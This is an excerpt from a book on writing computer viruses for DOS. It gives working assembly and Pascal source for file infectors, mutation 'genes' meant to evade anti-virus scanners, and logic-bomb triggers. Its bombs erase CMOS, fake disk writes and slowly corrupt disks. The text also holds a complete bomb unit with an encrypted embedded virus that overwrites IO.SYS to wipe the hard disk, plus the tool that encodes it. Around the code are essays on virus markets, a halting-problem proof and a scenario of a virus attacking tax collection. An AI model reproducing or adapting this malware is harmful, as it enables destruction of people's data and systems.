10: xchg ax,bx ;write virus to file
11: mov ah,40H
12: mov cx,OFFSET VIRUS_END-OFFSET START+MAXSIZECHANGE;size of virus
13: mov dx,OFFSET VIRUS_BUFFER ;location of this virus
14: int 21H
15: mov ah,3EH
16: int 21H ;close file
17: mov ah,4FH
18: int 21H ;search for next file
19: jmp SEARCH_LP
20: DONE:
21: ret ;exit to DOS
22:
23: COM_FILE DB ’*.COM’,0 ;string for COM file search
When fully devolved, the virus will simply be some variant of this
prototype, with no genetic content from the parent except the code
it uses to replicate, and no practical ability to evolve further.
Now let’s start designing the prototype. Since the virus will end
up looking something like the above, it makes sense to directly use
the above routine as the actual infection mechanism in the proto-
type, and add the genetics on top of it. To do this we just add two
calls in front of the infector:
START:
call MUTATE
call BUILD_VIRUS
SIMPLE_START:
produce a virus that doesn’t perform the search next properly, and
either loops indefinitely or stops after infecting one file. Presum-
ably such variants would be weeded out on incompatible systems
by evolution.
Gene 6
Gene 6 implements a tricky anti-anti-virus measure in lines 4
and 23. Basically, it first changes the ‘C’ in ‘*.COM’ to a ‘D’. Next,
in place of the int 21H in line 4, it uses the code:
mov BYTE PTR [L+7],4
L: dec BYTE PTR [bx+2]
int 21H
inc BYTE PTR [bx+2]
mov BYTE PTR [L+7],2
Gene 9
Gene 9 modifies line 15. When turned on, it replaces mov
ah,3EH with mov eax,3E000000H/shr eax,24.
Gene 10
Gene 10 modifies line 10. When off, line 10 is xchg ax,bx,
when on, it is mov bx,ax.
Gene 11
Gene 11 changes line 11 to read mov eax,40000H/shr
eax,4. Note that some of the genes that use 386 instructions, or
features of the 386 processor, will produce sterile viruses on pre-386
machines. However, such instances should be rare because the great
bulk of machines in use today are 386 and up.
Gene 12
When Gene 12 is on, lines 17-19 are removed from the virus.
The result is a virus that infects only one file.
Gene 13
When Gene 13 is on, a call SIMPLE_START+3 is inserted
before line 2. This may cause the virus to run twice, depending on
the state of Genes 7 and 8, but it does no harm.
Gene 14 and 15
Genes 14 and 15 control the coding of the int 21H instruc-
tions in the search loop. If both genes are off, the DOS calls are
simply coded as int 21H’s. If Genes 14 and 15 are both on, then the
code
xor ax,ax
mov es,ax
is added at the beginning of the virus, and DOS calls are coded as
pushf
call FAR es:[0084]
Megapolitical Revolution
Viruses today are written by two basic groups of people: One
group is the tinkers, thinkers and scientists. They write viruses as
an experiment, trying to see what they can do. The other group is
the misfits—the mad-at-the-world crowd. These want to get back
at someone, or a company, or lash out at the world.
The people who write viruses are a direct reflection on society,
in as much as there is no market for self-reproducing programs per
se. The motivations of virus authors are either intellectual or
vengeful, but not economic, patriotic, etc. It also directly influences
the technology: many viruses are malicious, and knowledge of how
to write them is considered by many a black art. This in turn molds
the public’s perception about virus authors and viruses, and tends
to put anti-virus developers in a good position. It creates a market
for their products and causes the public to see them as “good guys.”
Megapolitical Change
“Megapolitical” change is simply change in society that is
driven by factors that go beyond ordinary political explanations.1
Such changes are driven by factors that are beyond the control of
men and nations. One simple example is the fact that over the past
250 years the earth has been warming up. This has led to a growing
abundance of agricultural products, less famine, and increasing
prosperity. It has led to long-term stability in governments, and a
situation in which wars have been chiefly matters of ideology, and
not economic survival. Thus, for example, the Soviet Union was
engaged in a cold war with the west for so many years because of
differences in ideology, and not because her people were hungry.
Megapolitical changes are often driven by technological inno-
vation. Some examples from history include the development of
agriculture, which transformed the hunter-gatherer society into an
advanced, wealth-accumulating civilization in which land owner-
ship conferred power. Again, the invention of the stirrup in the
Middle Ages was a major factor in determining the structure of
feudal society. The stirrup made a well-trained warrior on horse-
back far superior to a foot soldier. The horse, sword and armor—
expensive equipment at the time—cemented a certain relationship
between military power and wealth. The gunpowder revolution
more power than they’ve been able to for centuries. In the end, these
people and groups will carve up the large nation-state. These people
might include drug lords, terrorist organizations, powerful busi-
nessmen, street gangs, and private or semi-private militias.
These trends will accelerate in times of recession, war, trouble,
etc. Which company is going to survive better, the one with a
price/earnings ratio of 50 that is in debt up to its eyeballs, or the one
with a ratio of 1/2 and debt free? Or in a war, which nation will be
impoverished faster, the one that fields billions of dollars worth of
aircraft, or the one that can’t afford so many aircraft, but can afford
small computerized missiles that will shoot every one of their
enemy’s aircraft down? We’ve already seen such wars. The Rus-
sian invasion of Afghanistan is a classic example. That a bunch of
nomadic tribesmen were able to hold off a world superpower is a
surprising new development.
Take this to its logical conclusion now: Groups that we consider
to be mere commercial interests, or even outlaw organizations may
gain a certain degree of sovereignty. Even an individual with a net
worth of $1 million may be able to field a robotic army that is totally
loyal to him, and achieve a status that only nations have had in the
past.
In short, computers are a megapolitical force that will cause
revolutions in government, economics, philosophy and religion.
We’re even going to have to re-think our ideas of right and wrong
as a result. For example, we think the nation state has the power to
absolve us from murder in the context of war. How will this work
in a world with many lesser sovereignties? When Alexander the
Great was about to execute a pirate, the pirate challenged him and
accused him of being merely a pirate himself, on a larger scale.
Certainly there is some truth in the pirate’s accusation. This prob-
lem is going to assume new relevance in the 21st century.
The Market for Virus Technology
Let’s go back to computer viruses now, and ask how these
megapolitical trends are going to affect virus development.
We must understand that virus development, like most software
development, has been largely market driven. There is no reason to
suspect that will change. The markets themselves, however, may
change dramatically.
The Future Threat 389
conceal its true nature from the casual examiner so it will not be
immediately apparent to the government that it is under attack.
Deployment is completed through a mole at the CD-ROM
manufacturer. People who are in the know about what the virus
does willingly infect their computers with it and give it to all their
friends. By the end of January, nearly 70% of all the computers in
the country are infected, and tax returns have started to trickle in.
The IRS has become aware that they are under attack, and they
know they have big problems.
Anti-virus developers get on the problem and update their
software, but they find that their software stops selling. An emer-
gency government edict on February 12 requires everyone to use a
government-distributed anti-virus program on his or her computer
to eradicate the virus. Non-compliant residents face a ten-year
prison sentence. The stock of Acme Antivirus, which developed the
program, goes up tenfold on the day of the announcement. The
postal service is charged with mailing out diskettes to every house-
hold in America. On the bond markets, government bonds take a
beating. Rates, already high due to millennium bug woes, move up
over 15%.
By February 28, people have run their anti-virus software,
which only drives the evolutionary capability of the virus. A
superficial analysis of the virus resulted in an incapable anti-virus.
Although there was a brief period where electronic returns were
looking better, the virus is right back where it was. Bad returns are
flooding in, as people try to break the system before the government
can fix the problem.
On March 6, the president of Acme Antivirus is found dead in
a river near his home. No one is sure whether it was suicide,
retribution by the government, or a warning by angry taxpayers lest
any other antivirus company try to solve the problem. In any event,
what was thought to be an ordinary virus now appears to be at least
some 10,000 completely independent viruses. Other antivirus com-
panies equivocate about solving the problem, saying analysis will
take at least six months. Rates on government bonds have shot up
over 35% as it becomes apparent that the US government is being
forced to stop collecting taxes. Taxpayers aren’t even bothering to
file returns anymore. Instead, they’re supporting their parents,
whose social security payments have stopped as the government
tries desperately to cover its interest payments. Riots erupt across
Open-Ended Evolution
Now, suppose open-ended Darwinian evolution is possible in
the world of computer viruses. Right now, I’m inclined to believe
it’s not, but the scientific theory just doesn’t exist to prove it one
way or the other, so somebody could prove me wrong.
Certainly I don’t want to be closed-minded about it, and given the
implications of what might happen if it is possible, I don’t think we
should ignore it or assume nothing bad will happen.
Simply put, if open-ended Darwinian evolution is possible,
then it may be possible to create a virus that cannot be caught, and
that will keep growing in complexity until it completely destroys
the world’s computing resources, and quite possibly its human
resources as well. Let’s consider this:
One can mathematically prove that it is impossible to design a
perfect scanner, which can always determine whether a program
has a virus in it or not. In layman’s terms, an ideal scanner is a
mathematical impossibility. Remember, a scanner is a program
which passively examines another program to determine whether
or not it contains a virus.
This problem is similar to the halting problem for a Turing
machine,2 and the proof goes along the same lines. To demonstrate
such an assertion, let’s first define a virus and an operating envi-
ronment in general terms:
An operating environment consists of an operating system on
a computer and any relevant application programs which are resi-
2 An easy to follow introduction to the halting problem and Turing machines in general
is presented in Roger Penrose, The Emperor’s New Mind, (Oxford University Press,
New York: 1989).
SCAN(P,x) =
{ 0 if P(x) is safe
3 The theorem and proof presented here are adapted from William F. Dowling, “There
Are No Safe Virus Tests,” The Teaching of Mathematics, (November, 1989), p. 835.
                x
  P     0  1  2  3  4  5  6
  0     0  0  0  0  0  0  0
  1     0  0  1  0  1  0  0
  2     0  1  1  0  0  0  0
  3     1  1  1  1  1  1  1
  4     0  0  0  0  0  0  0
  5     1  0  0  1  0  0  0
  6     0  0  1  0  0  0  0
This table shows the output of our hypothetical SCAN for every
conceivable program and every conceivable input. The problem is
that we can construct a program V with input x as follows:
SCAN(V,x) = NOT SCAN(x,x)
Thus its values in the table for SCAN should always be exactly
opposite to the diagonal values in the table for SCAN,
0 1 2 3 4 5 6
.
.
V 1 1 0 0 1 1 1
.
.
SCAN(V,V) = NOT SCAN(V,V)
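The diagonal construction can be checked mechanically on the 7 x 7 corner of the table shown above. The following Python sketch is only an illustration: the names TABLE, diagonal_row and differs_from_every_row are my own, and a finite excerpt obviously proves nothing about the full, infinite table. It simply builds the row for V by flipping each diagonal entry and confirms that this row disagrees with every listed row in at least one column.

```python
# Finite excerpt of the hypothetical SCAN table: TABLE[p][x] = SCAN(p, x).
TABLE = [
    [0, 0, 0, 0, 0, 0, 0],
    [0, 0, 1, 0, 1, 0, 0],
    [0, 1, 1, 0, 0, 0, 0],
    [1, 1, 1, 1, 1, 1, 1],
    [0, 0, 0, 0, 0, 0, 0],
    [1, 0, 0, 1, 0, 0, 0],
    [0, 0, 1, 0, 0, 0, 0],
]


def diagonal_row(table):
    """Return the row for V: entry x is the opposite of table[x][x]."""
    return [1 - table[x][x] for x in range(len(table))]


def differs_from_every_row(table, row):
    """True if `row` disagrees with row p at column p, for every p."""
    return all(row[p] != table[p][p] for p in range(len(table)))


V_ROW = diagonal_row(TABLE)
print("V", *V_ROW)
print(differs_from_every_row(TABLE, V_ROW))
```

Because V is itself a program, it would have to occupy some row of a complete table, and in that row its own diagonal entry would have to differ from itself. No table of SCAN values can satisfy that.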
The Problem
What we learn from the halting problem is that a scanner has
inherent limits. It can never detect all possible viruses.
At the same time, we’ve seen that integrity checkers cannot
detect a virus without allowing it to execute once—and having
executed once, the virus has a chance to retaliate against anything
that can’t remove it completely, and it has a chance to convince the
user to let it stay.
The problem, you see, is that evolution as we understand it is
somewhat open-ended. An anti-virus has its limits, thanks to Tur-
ing, and a virus can find those limits and exploit them, thanks to
Darwin.
Now, I am not really sure about how much power evolution has
to “grow” computer viruses. I’ve discussed the matter at length in
my other book, Computer Viruses, Artificial Life and Evolution.
However, if you take the current theory of evolution, as it applies
to carbon-based life, at face value, then evolution has a tremen-
dous—almost limitless—amount of power.
Could there come a time when computer viruses become very
adept at convincing computer users to let them stay after executing
them just once, while being essentially impossible to locate before
they execute? Could they become like highly addictive drugs
running rampant in an affluent society that prefers entertainment to
4 A number of very high level educational researchers seem to agree with me too. For
example, Benjamin Bloom, the father of Outcome Based Education, wrote that “a
single hour of classroom activity under certain conditions may bring about a major
reorganization in cognitive as well as affective domains.” (Taxonomy of Educational
Objectives, 1956, p. 58). Couldn’t a virus do the same?
Trigger Mechanisms
Triggers can cause the bomb to detonate under a wide variety
of circumstances. If you can express any set of conditions logically
and if a piece of software can sense these conditions, then they can
be coded into a trigger mechanism. For example, a trigger routine
could activate when the PC’s date reads January 1, 2000 if your
computer has an Award BIOS and a SCSI hard disk, and you type
the word “garbage”. On the other hand, it would be rather difficult
to make it activate at sunrise on the next cloudy day, because that
can’t be detected by software. This is not an entirely trivial obser-
vation—chemical bombs with specialized hardware are not subject
to such limitations.
For the most part, logic bombs incorporated into computer
viruses use fairly simple trigger routines. For example, they activate
on a certain date, after a certain number of executions, or after a
certain time in memory, or at random. There is no reason this
simplicity is necessary, though. Trigger routines can be very com-
plex. In fact, the Virus Creation Lab allows the user to build much
more complex triggers using a pull-down menu scheme.
Typically, a trigger might simply be a routine which returns
with the z flag set or reset. Such a trigger can be used something
like this:
LOGIC_BOMB:
call TRIGGER ;detonate bomb?
jnz DONT_DETONATE ;nope
call BOMB ;yes
DONT_DETONATE:
Where this code is put may depend on the trigger itself. For
example, if the trigger is set to detonate after a program has been
in memory for a certain length of time, it would make sense to make
it part of the software timer interrupt (INT 1CH). If it triggers on a
certain set of keystrokes, it might go in the hardware keyboard
interrupt (INT 9), or if it triggers when a certain BIOS is detected,
it could be buried within the execution path of an application
program.
Let’s take a look at some of the basic tools a trigger routine can
use to do its job:
Time Trigger
On the other hand, triggering after a certain period of time can
be accomplished with something as simple as this:
INT_1C:
inc cs:[COUNTER]
call TRIGGER
jnz I1CEX
call BOMB
I1CEX: jmp DWORD PTR cs:[OLD_INT1C]
will make TRIG_VAL copies of itself and then trigger. Each copy
will have a fresh counter set to zero. The Lehigh virus, which was
one of the first viruses to receive a lot of publicity in the late 80’s,
used this kind of a mechanism.
One could, of course, code this replication trigger a little
differently to get different results. For example,
call TRIGGER
jnz GOON ;increment counter if no trigger
call BOMB ;else explode
mov [COUNTER],0 ;start over after damage
GOON: inc [COUNTER] ;increment counter
call REPLICATE ;make new copy w/ new counter
dec [COUNTER] ;restore original value
The first generation will make TRIG_VAL copies of itself and then
trigger. One of the TRIG_VAL second-generation copies will make
TRIG_VAL-1 copies of itself (because it starts out with COUNTER
= 1) and then detonate. This arrangement gives a total of 2^TRIG_VAL
bombs exploding. This is a nice way to handle a virus dedicated to
attacking a specific target because it doesn’t just keep replicating
and causing damage potentially ad infinitum. It just does its job and
goes away.
Time
DOS function 2CH reports the current system time. Typically
a virus will trigger after a certain time, or during a certain range of
time. For example, to trigger between four and five PM, the trigger
could look like this:
TRIGGER:
mov ah,2CH
int 21H
cmp ch,4+12 ;check hour
ret ;return z if 4:XX pm
Country
One could write a virus to trigger only when it finds a certain
country code in effect on a computer by using DOS function 38H.
The country codes used by DOS are the same as those used by the
phone company for country access codes. Thus, one could cause a
virus to trigger only in Germany and nowhere else:
TRIGGER:
mov ah,38H
mov al,0 ;get country info
mov dx,OFFSET BUF ;buffer for country info
int 21H
cmp bx,49 ;is it Germany?
ret
This trigger and a date trigger (December 7) are used by the Pearl
Harbor virus distributed with the Virus Creation Lab. It only gets
nasty in Japan.
Video Mode
By using the BIOS video services, a virus could trigger only
when the video is in a certain desired mode, or a certain range of
modes:
TRIGGER:
mov ah,0FH
int 10H ;get video mode
and al,11111100B ;mode 0 to 3?
ret
SREXNZ: pop es
inc al ;return with nz - no matches
ret
Null Trigger
Finally, we come to the null trigger, which is really no trigger
at all. Simply put, the mere placement of a logic bomb can serve as
trigger enough. For example, one might completely replace DOS’s
critical error handler, int 24H, with a logic bomb. The next time that
handler gets called (for example, when you try to write to a
write-protected diskette) the logic bomb will be called. In such
cases there is really no trigger at all—just the code equivalent of a
land mine waiting for the processor to come along and step on it.
Logic Bombs
Next, we must discuss the logic bombs themselves. What can
malevolent programs do when they trigger? The possibilities are at
least as endless as the ways in which they can trigger. Here we will
discuss some possibilities to give you an idea of what can be done.
will work quite fine. You might stop hardware interrupts too, to
force the user to press the reset button:
BOMB: cli
jmp $
This routine doesn’t really care about the total number of cylinders.
If it works long enough to exceed that number it won’t make much
difference—everything will be ruined by then anyhow.
Another possible approach is to bypass disk writes. This would
prevent the user from writing any data at all to disk once the bomb
activated. Depending on the circumstances, of course, he may never
realize that his write failed. This bomb might be implemented as
part of an int 13H handler:
INT_13:
call TRIGGER
jnz I13E
cmp ah,3 ;trigger triggered-is it a write
jnz I13E ;no-handle normally
clc ;else fake a successful read
retf 2
414 The Giant Black Book of Computer Viruses
I13E: jmp DWORD PTR cs:[OLD_13]
One other trick is to convert BIOS int 13H read and write
(Function 2 and 3) calls to long read and write (Function 10 and 11)
calls. This trashes the 4 byte long error correction code at the end
of the sector making the usual read (Function 2) fail. That makes
the virus real hard to get rid of, because as soon as you do, Function
2 no longer gets translated to Function 10, and it no longer works,
either. The Volga virus uses this technique.
Damaging Hardware
Generally speaking it is difficult to cause immediate hardware
damage with software—including logic bombs. Computers are
normally designed so that can’t happen. Occasionally, there is a bug
in the hardware design which makes it possible to cause hardware
failure if you know what the bug is. For example, in the early 1980’s
when IBM came out with the original PC, there was a bug in the
monochrome monitor/controller which would allow software to
ruin the monitor by sending the wrong bytes to the control registers.
Of course, this was fixed as soon as the problem was recognized.
Theoretically, at least, it is still possible to damage a monitor by
adjusting the control registers. It will take some hard work, hard-
ware specific research, and a patient logic bomb to accomplish this.
It would seem possible to cause damage to disk drives by
exercising them more than necessary—for example, by doing lots
of random seeks while they are idle. Likewise, one might cause
damage by seeking beyond the maximum cylinder number. Some
drives just go ahead and crash the head into a stop when you attempt
this, which could result in head misalignment. Likewise, one might
be able to detect the fact that the PC is physically hot (you might
try detecting the maximum refresh rate on the DRAMs) and then
try to push it over the edge with unnecessary activity. Finally, on
portables it is an easy matter to run the battery down prematurely.
For example, just do a random disk read every few seconds to make
sure the hard disk keeps running and keeps drawing power.
I’ve heard that Intel has designed the new Pentium processors
so one can download the microcode to them. This is in response to
the floating point bug which cost them so dearly. If a virus could
Destructive Code 415
2 A good way to learn to think about simulating hardware failure is to get a book on
fixing your PC when it’s broke and studying it with your goal in mind.
Publisher which convinced them that their serial port was bad.
Though the mouse wouldn’t work on their machine at all, it was
because in the batch file which started Ventura up, the mouse
specification had been changed from M=03 to M=3. Once the batch
file was run, Ventura did something to louse up the mouse for every
other program too.
CMOS Battery Failure
Failure of the battery which runs the CMOS memory in AT
class machines is an annoying but common problem. When it fails
the date and time are typically reset and all of the system informa-
tion stored in the CMOS including the hard disk configuration
information is lost. A logic bomb can trash the information in
CMOS which could convince the user that his battery is failing. The
CMOS is accessed through i/o ports 70H and 71H, and a routine to
erase it is given by:
mov cx,40H ;prep to zero 40H bytes
xor ah,ah
CMOSLP: mov al,ah ;CMOS byte address to al
out 70H,al ;request to write byte al
xor al,al ;write a zero to requested byte
out 71H,al ;through port 71H
inc ah ;next byte
loop CMOSLP ;repeat until done
Monitor Failure
By writing illegal values to the control ports of a video card,
one can cause a monitor to display all kinds of strange behaviour
which would easily convince a user that something is wrong with
the video card or the monitor. These can range from blanking the
screen to distortion to running lines across the screen.
Now obviously one cannot simulate total failure of a monitor
because one can always reboot the machine and see the monitor
behave without trouble when under the control of BIOS.
What one can simulate are intermittent problems: the monitor
blinks into the problem for a second or two from time to time, and
then goes back to normal operation. Likewise, one could simulate
mode-dependent problems. For example, any attempt to go into a
1024 x 768 video mode could be made to produce a simulated
problem.
Stealth Attack
So far, the types of attacks we have discussed become apparent
to the user fairly quickly. Once the attack has taken place his
response is likely to be an immediate realization that he has been
attacked, or that he has a problem. That does not always have to be
the result of an attack. A logic bomb can destroy data in such a way
that it is not immediately obvious to the user that anything is wrong.
Typical of the stealth attack is slow disk corruption, which is used
in many computer viruses.
Typically, a virus that slowly corrupts a disk may sit in memory
and mis-direct a write to the disk from time to time, so either data
gets written to the wrong place or the wrong data gets written. For
example, the routine
INT_13:
cmp ah,3 ;a write?
jnz I13E ;no, give it to BIOS
call RAND_CORRUPT ;corrupt this write?
jz I13E ;no, give it to BIOS
push bx
add bx,1500H ;trash bx
pushf
call DWORD PTR cs:[OLD_13] ;call the BIOS
pop bx ;restore bx
retf 2 ;and return to caller
I13E: jmp DWORD PTR cs:[OLD_13]
Typically, stealth attacks like this have the advantage that the user
may not realize he is under attack for a long time. As such, not only
will his hard disk be corrupted, but so will his backups. The
disadvantage is that the user may notice the attack long before it
destroys lots of valuable data.
Indirect Attack
Moving beyond the overt, direct-action attacks, a logic bomb
can act indirectly. For example, a logic bomb could plant another
logic bomb, or it could plant a logic bomb that plants a third logic
bomb, or it could release a virus, etc.
By using indirect methods like this it becomes almost impos-
sible to determine the original source of the attack. Indeed, an
indirect attack may even convince someone that another piece of
software is to blame. For example, one logic bomb might find an
entry point in a Windows executable and replace the code there with
a direct-acting bomb. This bomb will then explode when the
function it replaced is called within the program that was modified.
That function could easily be something the user only touches once
a year.
In writing and designing logic bombs, one should not be
unaware of user psychology. For example, if a logic bomb requires
some time to complete its operation (e.g. overwriting a significant
portion of a hard disk) then it is much more likely to succeed if it
entertains the user a bit while doing its real job. Likewise, one
should be aware that a user is much less likely to own up to the real
cause of damage if it occurred when they were using unauthorized
or illicit software. In such situations, the source of the logic bomb
will be concealed by the very person attacked by it. Also, if a user
thinks he caused the problem himself, he is much less likely to
blame a bomb. (For example, if you can turn a “format a:” into a
“format c:” and proceed to do it without further input, the user
might think he typed the wrong thing, and will be promptly fired if
he confesses.)
Example
Now let’s take some of these ideas and put together a useful
bomb and trigger. This will be a double-acting bomb which can be
incorporated into an application program written in Pascal. At the
first level, it checks the system BIOS to see if it has the proper date.
If it does not, Trigger 1 goes off, the effect of which is to release a
virus which is stored in a specially encrypted form in the application
program. The virus itself contains a trigger which includes a finite
counter bomb with 6 generations. When the second trigger goes off
(in the virus), the virus’ logic bomb writes code to the IO.SYS file,
which in turn wipes out the hard disk. So if the government seizes
your computer and tries the application program on another ma-
chine, they’ll be sorry. Don’t the Inslaw people wish they had done
this! It would certainly have saved their lives.
implementation
{The following constants must be set to the proper values before compiling
this TPU}
const
VIRSIZE =654; {Size of virus to be released}
VIRUS :array[0..VIRSIZE-1] of byte=(121,74,209,113,228,217,200,
48,127,169,231,22,127,114,19,249,164,149,27,
2,22,86,109,173,142,151,117,252,138,194,241,173,131,219,236,123,107,219,
44,184,231,188,56,212,0,241,70,135,82,39,191,197,228,132,39,184,52,206,
136,74,47,31,190,20,8,38,67,190,55,1,77,59,59,120,59,16,212,148,200,185,
198,87,68,224,65,188,71,130,167,197,209,228,169,42,130,208,70,62,15,172,
115,12,98,116,214,146,109,176,55,30,8,60,245,148,49,45,108,149,136,86,
193,14,82,5,121,126,192,129,247,180,201,126,187,33,163,204,29,156,24,
14,254,167,147,189,184,174,182,212,141,102,33,244,61,167,208,155,167,
Destructive Code 421
236,173,211,150,34,220,218,217,93,170,65,99,115,235,0,247,72,227,123,
19,113,64,231,232,104,187,38,27,168,162,119,230,190,61,252,90,54,10,167,
140,97,228,223,193,123,242,189,7,91,126,191,81,255,185,233,170,239,35,
24,72,123,193,210,73,167,239,43,13,108,119,112,16,2,234,54,169,13,247,
214,159,11,137,32,236,233,244,75,166,232,195,101,254,72,20,100,241,247,
154,86,84,192,46,72,52,124,156,79,125,14,250,65,250,34,233,20,190,145,
135,186,199,241,53,215,197,209,117,4,137,36,8,203,14,104,83,174,153,208,
91,209,174,232,119,231,113,241,101,56,222,207,24,242,40,236,6,183,206,
44,152,14,36,34,83,199,140,1,156,73,197,84,195,151,253,169,73,81,246,
158,243,22,46,245,85,157,110,108,164,110,240,135,167,237,124,83,173,173,
146,196,201,106,37,71,129,151,63,137,166,6,89,80,240,140,88,160,138,11,
116,117,159,245,129,102,199,0,86,127,109,231,233,6,125,162,135,54,104,
158,151,28,10,245,45,110,150,187,37,189,120,76,151,155,39,99,43,254,103,
133,93,89,131,167,67,43,29,191,139,27,246,21,246,148,130,130,172,137,
60,53,238,216,159,208,84,39,130,25,153,59,0,195,230,37,52,205,81,32,120,
220,148,245,239,2,6,59,145,20,237,14,149,146,252,133,18,5,206,227,250,
193,45,129,137,84,159,159,166,69,161,242,81,190,54,185,196,58,151,49,
116,131,19,166,16,251,188,125,116,239,126,69,113,5,3,171,73,52,114,252,
172,226,23,133,180,69,190,59,148,152,246,44,9,249,251,196,85,39,154,184,
74,141,91,156,79,121,140,232,172,22,130,253,253,154,120,211,102,183,145,
113,52,246,189,138,12,199,233,67,57,57,31,74,123,94,1,25,74,188,30,73,
83,225,24,23,202,111,209,77,29,17,234,188,171,187,138,195,16,74,142,185,
111,155,246,10,222,90,67,166,65,103,151,65,147,84,83,241,181,231,38,11,
237,210,112,176,194,86,75,46,208,160,98,146,171,122,236,252,220,72,196,
218,196,215,118,238,37,97,245,147,150,141,90,115,104,90,158,253,80,176,
198,87,159,107,240,15);
type
byte_arr =array[0..10000] of byte;
var
vir_ptr :pointer;
vp :^byte_arr;
{This routine triggers if the system BIOS date is not the same as
SYS_DATE_CHECK. Triggering is defined as returning a TRUE value.}
function Trigger_1:boolean;
var
SYS_DATE :array[0..8] of char absolute $F000:$FFF5;
j :byte;
begin
Trigger_1:=false;
for j:=0 to 8 do
if SYS_DATE_CHECK[j]<>SYS_DATE[j] then Trigger_1:=true;
end;
{This procedure calls the virus in the allocated memory area. It does its
job and returns to here}
procedure call_virus; assembler;
asm
call DWORD PTR ds:[vp]
end;
{This procedure releases the virus stored in the data array VIRUS by setting
up a segment for it, decrypting it into that segment, and executing it.}
procedure Release_Virus;
var
w :array[0..1] of word absolute vir_ptr;
j :word;
begin
GetMem(vir_ptr,VIRSIZE+16); {allocate memory to executable virus}
if (w[0] div 16) * 16 = w[0] then vp:=ptr(w[1]+(w[0] div 16),0)
else vp:=ptr(w[1]+(w[0] div 16)+1,0); {adjust starting offset to 0}
422 The Giant Black Book of Computer Viruses
begin
if Trigger_1 then Release_Virus;
end.
;Main routine starts here. This is where cs:ip will be initialized to.
VIRUS:
push ax ;save startup info in ax
mov al,cs:[FIRST] ;save this
mov cs:[FIRST],1 ;and set it to 1 for replication
push ax
push es
push ds
push cs
pop ds ;set ds=cs
mov ah,2FH ;get current DTA address
int 21H
push es
push bx ;save it on the stack
mov ah,1AH ;set up a new DTA location
mov dx,OFFSET DTA ;for viral use
int 21H
call TRIGGER ;see if logic bomb should trigger
jnz GO_REP ;no, just go replicate
call BOMB ;yes, call the logic bomb
jmp FINISH ;and exit without further replication
GO_REP: call FINDEXE ;get an exe file to attack
jc FINISH ;returned c - no valid file, exit
call INFECT ;move virus code to file we found
FINISH: pop dx ;get old DTA in ds:dx
pop ds
mov ah,1AH ;restore DTA
int 21H
pop ds ;restore ds
pop es ;and es
pop ax
mov cs:[FIRST],al ;restore FIRST flag now
pop ax ;restore startup value of ax
cmp BYTE PTR cs:[FIRST],0 ;is this the first execution?
je FEXIT ;yes, exit differently
Destructive Code 423
cli
mov ss,WORD PTR cs:[HOSTS] ;set up host stack properly
mov sp,WORD PTR cs:[HOSTS+2]
sti
jmp DWORD PTR cs:[HOSTC] ;begin execution of host program
INCLUDE BOMBINC.ASM
Note that one could use many of the viruses we’ve discussed
in this book with the BOMB unit. The only requirements are to set
up a segment for it to execute properly at the right offset when
called, and to set it up to return to the caller with a retf the first time
it executes, rather than trying to pass control to a host that doesn’t
exist.
The BOMBINC.ASM routine is given by the following code.
It contains the virus’ counter-trigger which allows the virus to
reproduce for six generations before the bomb is detonated. It also
contains the bomb for the virus, which overwrites the IO.SYS file
with another bomb, also included in the BOMBINC.ASM file.
;The following Trigger Routine counts down from 6 and detonates
TRIGGER:
cmp BYTE PTR [COUNTER],0
jz TRET
dec [COUNTER]
mov al,[COUNTER]
mov al,1
or al,al
TRET: ret
COUNTER DB 6
;The following Logic Bomb writes the routine KILL_DISK into the IO.SYS file.
;To do this successfully, it must first make the file a normal read/write
;file, then it should write to it, and change it back to a system/read only
;file.
BOMB:
mov dx,OFFSET FILE_ID1 ;set attributes to normal
mov ax,4301H
mov cx,0
int 21H
jnc BOMB1 ;success, don’t try IBMBIO.COM
mov dx,OFFSET FILE_ID2
mov ax,4301H
mov cx,0
int 21H
jc BOMBE ;exit on error
BOMB1: push dx
mov ax,3D02H ;open file read/write
int 21H
jc BOMB2
mov bx,ax
mov ah,40H ;write KILL_DISK routine
mov dx,OFFSET KILL_DISK
mov cx,OFFSET KILL_END
424 The Giant Black Book of Computer Viruses
sub cx,dx
int 21H
mov ah,3EH ;and close file
int 21H
BOMB2: pop dx
mov ax,4301H ;set attributes to ro/hid/sys
mov cx,7
int 21H
BOMBE: ret
FILE_ID1 DB ’C:\IO.SYS’,0
FILE_ID2 DB ’C:\IBMBIO.COM’,0
const
RAND_INIT =10237989; {Must be same as BOMB.PAS}
var
fin :file of byte;
input_file :string;
output_file :string;
fout :text;
i,header_size :word;
b :byte;
Destructive Code 425
s,n :string;
begin
write(’Input file name : ’); readln(input_file);
write(’Output file name: ’); readln(output_file);
write(’Header size in bytes: ’); readln(header_size);
RandSeed:=RAND_INIT;
assign(fin,input_file); reset(fin); seek(fin,header_size);
assign(fout,output_file); rewrite(fout);
i:=0;
s:=’ (’;
repeat
read(fin,b);
b:=b xor Random(256);
str(b,n);
if i<>0 then s:=s+’,’;
s:=s+n;
i:=i+1;
if length(s)>70 then
begin
if not eof(fin) then s:=s+’,’ else s:=s+’);’;
writeln(fout,s);
s:=’ ’;
i:=0;
end;
until eof(fin);
if i>0 then
begin
s:=s+’);’;
writeln(fout,s);
end;
close(fout);
close(fin);
end.
Note that CODEVIR requires the size of the EXE header to work
properly. That can easily be obtained by inspection. In our example,
it is 512.
Summary
In general, the techniques employed in the creation of a logic
bomb will depend on the purpose of that bomb. For example, in a
military situation, the trigger may be very specific to trigger at a
time when a patrol is acting like they are under attack. The bomb
may likewise be very specific, to deceive them, or it may just trash
the disk to disable the computer for at least 15 minutes. On the other
hand, a virus designed to cause economic damage on a broader scale
might trigger fairly routinely, and it may cause slow and insidious
damage, or it may attempt to induce the computer user to spend
money.
Chapter 34
A Viral Unix
Security Breach
Source Code for this Chapter: \UNIX\SNOOPY.C
logged in as. You don’t have anyone else’s password, much less
the super user’s. Apparently, you’re stuck. That’s the whole idea
behind Unix security—to keep you stuck where you’re at, unless
the system administrator wants to upgrade you.
A Typical Scenario
Let’s imagine a Unix machine with at least three accounts,
guest, operator, and root. The guest user requires no password and
he can use files as he likes in his own directory, /usr/guest (read,
write and execute). He can’t do much outside this directory, though,
and he certainly doesn’t have access to master.passwd. The opera-
tor account has a password, and has access to a directory of its own,
/usr/operator, as well as /usr/guest. This account also does not have
access to master.passwd, though. The root account is the super user
who has access to everything, including master.passwd.
Now, if the guest user were to load Snoopy into his directory,
he could infect all his own programs, but nothing else. Since guest
is a public account with no password, the super user isn’t stupid
enough to run any programs in that account. However, operator
decides one day to poke around in guest, and he runs an infected
program. The result is that he infects every file in his own directory
/usr/operator. Since operator is known by root, and somewhat
trusted, root runs a program in /usr/operator. This program, how-
